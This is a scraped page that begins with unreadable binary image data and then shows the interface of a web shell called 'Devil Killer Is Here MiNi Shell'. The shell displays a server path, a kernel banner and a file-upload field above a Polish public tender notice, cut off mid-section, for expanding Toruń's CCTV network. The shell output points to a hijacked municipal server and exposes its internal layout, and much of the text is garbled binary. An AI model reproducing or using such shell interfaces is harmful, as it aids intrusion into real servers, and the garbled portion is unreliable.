JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240930/0052180601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Rozbudowa monitoringu wizyjnego miasta Torunia w zakresie wybudowania i uruchomienia 12 nowych punktów kamerowych z podziałem na 6 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Toruń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118856</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wały Gen. Sikorskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(56) 6119300</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wol@um.torun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.torun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa monitoringu wizyjnego miasta Torunia w zakresie wybudowania i uruchomienia 12 nowych punktów kamerowych z podziałem na 6 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9a3ee970-34de-4fdd-936d-a814a4bc7261</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00521806</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028447/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 &#34;Rozbudowa monitoringu wizyjnego miasta Torunia w zakresie wybudowania i uruchomienia 12 nowych punktów kamerowych&#34; - w 6 częściach.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umtorun.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umtorun.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy https://umtorun.ezamawiajacy.pl. 2.Osoby wyznaczone do kontaktu z Wykonawcami-Pan Wojciech Pryczek, Pan Yulian Melnychuk. 3.Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na stronie internetowej Urzędu Miasta Torunia: https://umtorun.ezamawiajacy.pl lub https://oneplace.marketplanet.pl. 4.Wymagania techniczne i organizacyjne wysyłania iodbierania dokumentów elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla Wykonawców–Regulacje i procedury procesu zakupowego https://umtorun.ezamawiajacy.pl. 5.Zamawiający określa,iż formaty przesyłanych danych tj.plików o wielkości do 100 MB muszą być zgodne z rozporządzeniem Rady Ministrów z dnia 12.04.2012r. w sprawie Krajowych Ram Interoperacyjności [...] (t.j.Dz.U. z 2017r. poz. 2247). Wykonawca może złożyć jednorazowo maks. 15 plików. 6.Za datę przekazania oferty,wniosków,zawiadomień,dokumentów elektronicznych,oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich wczytania do Platformy e-Zamawiający. 7.Komunikacja między Zamawiającym a Wykonawcami,w szczególności oświadczenia, wnioski,zawiadomienia oraz informacje,przekazywane są w formie elektronicznej za pośrednictwem Platformy w sekcji „Korespondencja”. Za datę przekazania zawiadomień oraz informacji przyjmuje się ich datę wpływu na Platformę. 8.Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję &#34;ZADAJ PYTANIE&#34; lub przy użyciu zakładki „Korespondencja&#34;. Zamawiający udzieli wyjaśnień niezwłocznie,jednak nie później niż na 2 dni przed upływem terminu składania ofert,pod warunkiem,że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ wpłynie po upływie terminu, o którym mowa powyżej, lub dotyczy udzielonych wyjaśnień, Zamawiający nie ma obowiązku udzielenia wyjaśnień oraz obowiązku przedłużenia terminu składania ofert. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ. Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ,Zamawiający przekaże Wykonawcom za pośrednictwem platformy. 9.Dokumenty elektroniczne,oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. 10.W przypadku przekazywania przez Wykonawcę dokumentu elektronicznego w formacie poddającym dane kompresji,opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest równoznaczne z poświadczeniem przez Wykonawcę za zgodność z oryginałem wszystkich elektronicznych kopii dokumentów zawartych w tym pliku,z wyjątkiem kopii poświadczonych odpowiednio przez innego Wykonawcę ubiegającego się wspólnie z nim o udzielenie zamówienia,przez podmiot,na którego zdolnościach lub sytuacji polega Wykonawca albo przez podwykonawcę. 11.Zamawiający treść zapytań wraz z wyjaśnieniami przekazuje niezwłocznie Wykonawcom,którym przekazał SWZ oraz zamieszcza wyjaśnienie na stronie internetowej–Platformie e-Zamawiający. 12.Zamawiający może w uzasadnionych przypadkach przed upływem terminu składania ofert zmienić treść SWZ. Każda wprowadzona przez Zamawiającego zmiana stanie się częścią SWZ i zostanie zamieszczona na Platformie e-Zamawiający. 13.Zamawiający informuje,iż w przypadku wątpliwości związanych z zasadami korzystania z Platformy e-Zamawiający,Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego pod nr tel.: +48 222572223,email:oneplace.admin@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Gmina Miasta Toruń, ul. Wały gen. Sikorskiego 8, 87-100 Toruń;<br/>b) inspektorem ochrony danych osobowych Zamawiającego jest Pan Marcin Kapiwąs, tel. 56 611 8802, e-mail: iod@um.torun.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605), dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informuję, że:<br/>1. Posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>2. Nie przysługuje Pani/Panu:<br/>- związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">79/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1.1.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych związanych z uruchomieniem czterech „punktów kamerowych” w ramach zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 2 punkty kamerowe przy ul. Rudackiej 26/32 – Szkoła Podstawowa nr 17” oraz pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 2 punkty kamerowe przy ul. Ogrodowej 3/5 – Szkoła Podstawowa nr 24” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.1.2.	Przedmiot zamówienia obejmuje:<br/>1)	Dwa „punkty kamerowe” przy ul. Rudackiej 26/32 – Szkoła Podstawowa nr 17 – usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/>Zakres prac:<br/>a)	montaż dwóch kamer kopułkowych, obrotowych na elewacji szkoły;<br/>b)	instalacja dwóch urządzeń SFP Midspan PoE;<br/>c)	instalacja okablowania teletechnicznego i elektrycznego w obiekcie wraz z szafką teletechniczną dla instalowanych kamer;<br/>d)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanych kamer do Centrum Monitoringu przy ul. Legionów 70/76 w Toruniu;<br/>e)	roboty budowlane polegające na: <br/>-	przygotowaniu na elewacji budynku punktów mocowań pod kamery;<br/>-	wybudowaniu rurociągów kablowych i przepustów ściennych od instalowanych kamer do skrzynki teletechnicznej oraz przyłączy energetycznych.<br/>2)	Dwa „punkty kamerowe” przy ul. Ogrodowej 3/5 – Szkoła Podstawowa nr 24 w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/> Zakres prac:<br/>a)	montaż dwóch kamer kopułkowych, obrotowych na elewacji szkoły;<br/>b)	instalacja dwóch urządzeń SFP Midspan PoE;<br/>c)	instalacja okablowania teletechnicznego i elektrycznego w obiekcie wraz z szafką teletechniczną dla instalowanych kamer;<br/>d)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanych kamer do Centrum Monitoringu przy ul. Legionów 70/76 w Toruniu;<br/>e)	roboty budowlane polegające na: <br/>-	przygotowaniu na elewacji budynku punktów mocowań pod kamery;<br/>-	wybudowaniu rurociągów kablowych i przepustów ściennych od instalowanych kamer do skrzynki teletechnicznej oraz przyłączy energetycznych.<br/>1.1.3.	Usługi i roboty budowlane, będące przedmiotem zamówienia zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamer wraz z uchwytami i zasilaczami. <br/>1.1.4.	Wykonawca zrealizuje przedmiot zamówienia w zakresie i w sposób określony w Projektach Wykonawczych, dotyczących części 1, opracowanych przez Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z marca 2024r. - posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnymi i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.2.1.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych związanych z uruchomieniem dwóch „punktów kamerowych” w ramach zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 2 punkty kamerowe przy skrzyżowaniu ulic Andersa/ul. Łódzkiej/ul. Stawki Południowe” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.2.2.	Przedmiot zamówienia obejmuje:<br/>1)	Dwa „punkty kamerowe” przy skrzyżowaniu ulic Andersa/ul. Łódzkiej/ul. Stawki Południowe – usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/>Zakres prac:<br/>a)	montaż dwóch kamer kopułkowych, obrotowych na istniejącym słupie oświetleniowym i maszcie wysięgnikowym - 2 szt.;<br/>b)	montaż szafki teletechnicznej typu OS26x40+KN, wraz z wyposażeniem – 1 szt.;<br/>c)	budowa rurociągu z rur DVK110 – 43,0m;<br/>d)	wymiana ram i pokryw studni typu A15 – 6 szt.;<br/>e)	wymiana ram i pokryw studni typu B125 – 4 szt.;<br/>f)	montaż linii kablowej UTP kat 6 FTP (żelowany zewnętrzny) w istniejącej i projektowanej kanalizacji kablowej – dł. Tras 176/inst.187; <br/>g)	instalacja okablowania teletechnicznego i elektrycznego;<br/>h)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanych kamer do Centrum Monitoringu, ul. Legionów 70/76 w Toruniu;<br/>i)	roboty budowlane, polegające na budowie rurociągów kablowych oraz przyłączy energetycznych.<br/>1.2.3.	Usługi i roboty budowlane, będące przedmiotem zamówienia zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamer wraz z uchwytami i zasilaczami. <br/>1.2.4.	Wykonawca zrealizuje przedmiot zamówienia w zakresie i w sposób określony w Projekcie Budowlanym oraz Projekcie Wykonawczym, dotyczących części 2, opracowanych przez Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z marca 2024r. - posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnymi i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub 